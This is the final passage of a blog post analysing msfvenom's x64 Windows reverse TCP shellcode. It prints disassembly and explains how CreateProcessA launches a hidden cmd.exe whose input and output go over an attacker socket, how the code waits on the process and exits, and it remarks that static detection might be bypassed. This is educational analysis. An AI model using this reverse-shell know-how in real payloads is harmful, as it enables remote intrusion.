Before we proceed with aligning our arguments for CreateProcessA on the stack and appropriate registers, we must set a couple of the member values in our STARTUPINFO structure. First, we set the STARTUPINFO.dwFlags member to 0x101. This sets the STARTF_USESTDHANDLES (0x100) flag, which tells CreateProcessA to use the hStdInput/Output/Error fields, and the STARTF_USESHOWWINDOW (0x001) flag, which tells it to honor the wShowWindow member. Since wShowWindow is still zero (SW_HIDE), the cmd.exe window is hidden and spawns invisibly (no console popup). We then load the address for our STARTUPINFO structure (rsp+0x18) into the rax register, and set the STARTUPINFO.cb member’s value to 0x68 (104 in decimal). STARTUPINFO.cb is the first member in our STARTUPINFO structure, and is responsible for holding the byte length of the structure.
We then load the PROCESS_INFORMATION structure’s address (located at rsp+0x00) into the rsi register. This structure will be responsible for holding the process and thread handles for our newly spawned cmd.exe process, as well as its process and thread IDs.
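The offsets used above (rsp+0x18, rsp+0x54, and the size 0x68) can be double-checked by computing the structure layouts in Python. This is a sketch under two assumptions: the member lists follow Microsoft’s documented 64-bit definitions of PROCESS_INFORMATION and STARTUPINFOA, and every member is aligned to its own size. The layout helper is my own.

```python
def layout(fields):
    """Return ({name: offset}, total_size) using natural alignment."""
    offsets, offset = {}, 0
    for name, size in fields:
        offset = (offset + size - 1) & ~(size - 1)  # align field to its size
        offsets[name] = offset
        offset += size
    return offsets, (offset + 7) & ~7  # round the struct up to 8 bytes


PROCESS_INFORMATION = [("hProcess", 8), ("hThread", 8),
                       ("dwProcessId", 4), ("dwThreadId", 4)]
STARTUPINFOA = [("cb", 4), ("lpReserved", 8), ("lpDesktop", 8), ("lpTitle", 8),
                ("dwX", 4), ("dwY", 4), ("dwXSize", 4), ("dwYSize", 4),
                ("dwXCountChars", 4), ("dwYCountChars", 4),
                ("dwFillAttribute", 4), ("dwFlags", 4),
                ("wShowWindow", 2), ("cbReserved2", 2), ("lpReserved2", 8),
                ("hStdInput", 8), ("hStdOutput", 8), ("hStdError", 8)]

pi_offsets, pi_size = layout(PROCESS_INFORMATION)
si_offsets, si_size = layout(STARTUPINFOA)
si_base = pi_size  # STARTUPINFO starts right after PROCESS_INFORMATION

print(hex(pi_size), hex(si_size))
print("dwFlags   at rsp+" + hex(si_base + si_offsets["dwFlags"]))
print("hStdInput at rsp+" + hex(si_base + si_offsets["hStdInput"]))
```

The three standard handles are the last three members of the structure, which is why pushing the socket handle three times before the zero fill puts them in exactly the right place.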
Since the stack is last-in-first-out, we’ll need to push our CreateProcessA arguments to the stack in reverse. So we push our lpProcessInformation argument in the rsi register first, followed by our lpStartupInfo argument in the rax register. Since the r8 register is still zero, lpCurrentDirectory, lpEnvironment, and dwCreationFlags will be set to zero. We then increment the r8 register by 0x1 so that we can set bInheritHandles to true. We then decrease the r8 register back to zero, and move the value into the r9 and rcx registers. This will set lpApplicationName, lpProcessAttributes, lpThreadAttributes all to zero as well. CreateProcessA’s arguments should look something like this (Note that the first 4 args represent rcx, rdx, r8, and r9 on the stack (aka shadow space)):
RSP+0x08 (rcx): lpApplicationName = NULL (not used)
RSP+0x10 (rdx): lpCommandLine = ptr to "cmd\0" (spawn cmd.exe)
RSP+0x18 (r8): lpProcessAttributes = NULL
RSP+0x20 (r9): lpThreadAttributes = NULL
RSP+0x28: bInheritHandles = TRUE (0x1) (socket handle inherited)
RSP+0x30: dwCreationFlags = 0 (default)
RSP+0x38: lpEnvironment = NULL (inherit parent environment)
RSP+0x40: lpCurrentDirectory = NULL (inherit cwd)
RSP+0x48: lpStartupInfo = ptr to STARTUPINFO (holds socket & process creation flags)
RSP+0x50: lpProcessInformation = ptr to PROCESS_INFORMATION (receive hProcess & hThread handles)
We now load the hash for the CreateProcessA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a non-zero value and our cmd.exe process should be running with STDIN/STDOUT/STDERR pointing to our reverse TCP shell.
4.2: Call WaitForSingleObject()
195: 48 31 d2 xor rdx,rdx
198: 48 ff ca dec rdx
19b: 8b 0e mov ecx,DWORD PTR [rsi]
19d: 41 ba 08 87 1d 60 mov r10d,0x601d8708 <- WaitForSingleObject()
1a3: ff d5 call rbp
After calling CreateProcessA, we need to tell our shellcode to wait for the cmd.exe process to finish, or else we’ll exit our process prematurely. This is what WaitForSingleObject does.
We start by zeroing out the rdx register, then decrementing it by 1. This will set the value of the rdx register to -1, telling WaitForSingleObject to wait indefinitely for the cmd.exe process to finish. The rsi register still points to our PROCESS_INFORMATION structure, and the process handle is its first member, so we dereference rsi to load the process handle into the ecx register (lower 32 bits of rcx).
We now load the hash for the WaitForSingleObject function into the r10d register (lower 32 bits of the r10 register) and call the function. The function’s return value depends on how the process terminates.
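Here is the timeout arithmetic as a tiny Python sketch. Python integers don’t wrap on their own, so the masks model the 64-bit register and the 32-bit timeout parameter.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

rdx = 0                   # xor rdx,rdx
rdx = (rdx - 1) & MASK64  # dec rdx wraps around to all ones

dw_milliseconds = rdx & 0xFFFFFFFF  # the timeout parameter is a 32-bit DWORD
INFINITE = 0xFFFFFFFF               # value of the Windows INFINITE constant

print(hex(rdx), dw_milliseconds == INFINITE)
```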
4.3: Call GetVersion() and exit process
1a5: bb f0 b5 a2 56 mov ebx,0x56a2b5f0 <- one version of ExitProcess()
1aa: 41 ba a6 95 bd 9d mov r10d,0x9dbd95a6 <- GetVersion()
1b0: ff d5 call rbp
1b2: 48 83 c4 28 add rsp,0x28
1b6: 3c 06 cmp al,0x6
1b8: 7c 0a jl 0x1c4
1ba: 80 fb e0 cmp bl,0xe0
1bd: 75 05 jne 0x1c4
1bf: bb 47 13 72 6f mov ebx,0x6f721347 <- ntdll.dll->RtlExitUserThread() (== ExitThread())
1c4: 6a 00 push 0x0
1c6: 59 pop rcx
1c7: 41 89 da mov r10d,ebx
1ca: ff d5 call rbp
We’re now in the final section of our shellcode. We start by loading the hash for ExitProcess function into the ebx register. We then load the hash for GetVersion and call the function. This will return a major and minor version number, along with some other information. But we only need the major version in the low-order byte of the rax register (the al register).
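We then clean up the shadow space (40 bytes) left behind on the stack from when we called CreateProcessA.
We now compare the al register to 0x6. We do this to see which version of Windows we’re running on. If we’re running on Windows Vista or higher, we continue on. Otherwise, we jump down to 0x1c4, where we prepare to exit the shellcode.
Now this next bit of shellcode at 0x1ba confused me at first. With the ExitProcess hash in ebx, the low byte in bl is 0xf0, so the comparison with 0xe0 is always false, meaning the instruction at 0x1bf is dead code in this payload. My best explanation is that this exit stub is shared between msfvenom’s EXITFUNC options. When the payload is generated with EXITFUNC=thread, ebx holds the hash for ExitThread instead, and the low byte of that hash is 0xe0. On Windows Vista and later, kernel32’s ExitThread export is forwarded to ntdll’s RtlExitUserThread, which our address lookup function can’t resolve, so the hash is swapped for one it can find. If you know of a different reason, please email me! I’d love to know.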
Anyways, we set the rcx register to 0x0, then move the hash for the ExitProcess function into the r10d register (lower 32 bits of the r10 register) and call the function. This tells Windows that the shellcode process has terminated successfully.
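The branch logic in this section can be written out as a short Python function. The function name and the sample GetVersion values are made up; the constants and comparisons come from the disassembly.

```python
EXIT_PROCESS_HASH = 0x56A2B5F0          # loaded into ebx at 0x1a5
RTL_EXIT_USER_THREAD_HASH = 0x6F721347  # loaded into ebx at 0x1bf


def pick_exit_hash(get_version_result: int, ebx: int = EXIT_PROCESS_HASH) -> int:
    """Return the hash that ends up in r10d for the final call rbp."""
    major = get_version_result & 0xFF  # al holds the major version
    if major < 6:                      # cmp al,0x6 / jl 0x1c4
        return ebx
    if (ebx & 0xFF) != 0xE0:           # cmp bl,0xe0 / jne 0x1c4
        return ebx
    return RTL_EXIT_USER_THREAD_HASH   # mov ebx,0x6f721347


# Hypothetical GetVersion results: low byte is major, next byte is minor.
for version in (0x0105, 0x0006, 0x000A):
    print(hex(version), hex(pick_exit_hash(version)))
```

With the ExitProcess hash in ebx, every version takes the same path, which matches the observation that the swap at 0x1bf never happens in this payload.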
Conclusion
We’ve covered a lot of ground in this post. We were able to analyze how shellcode walks the PEB and ROR-13 hashes DLLs and their individual functions, then compares those hashes to a user-supplied value and returns the appropriate pointer address for a requested function. We then watched how we can create a reverse TCP connection socket to our attacker machine, and spawn a cmd.exe process that communicates over that socket handle. Once finished with the process, we observed how the shellcode gracefully exits.
Even though Microsoft Defender is able to statically detect this shellcode, with enough manipulating and rearranging, it could be possible to bypass static detection. Though, the techniques covered in this post (PEB Walking, API Hashing, dynamic function resolution) would most likely be picked up by modern endpoint detection solutions. Understanding how shellcode works is valuable for both offensive and defensive security teams. Hopefully this post gave you a solid foundation for recognizing these patterns when you encounter them in the wild.
Sources
I was able to learn more about the Windows System Internals topics within this post via the following blog posts:
Find DLL base addresses from PEB: https://rootfu.in/how-to-part-1-find-dllbase-address-from-peb-in-x64-assembly/
LDR_DATA_TABLE_ENTRY structure reference: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntldr/ldr_data_table_entry.htm
Linked Lists: https://bsodtutorials.blogspot.com/2013/10/linked-lists-flink-and-blink.html
PE Header structure: https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/
Location of the Export Directory Table in a PE: https://xen0vas.github.io/Win32-Reverse-Shell-Shellcode-part-2-Locate-the-Export-Directory-Table/#
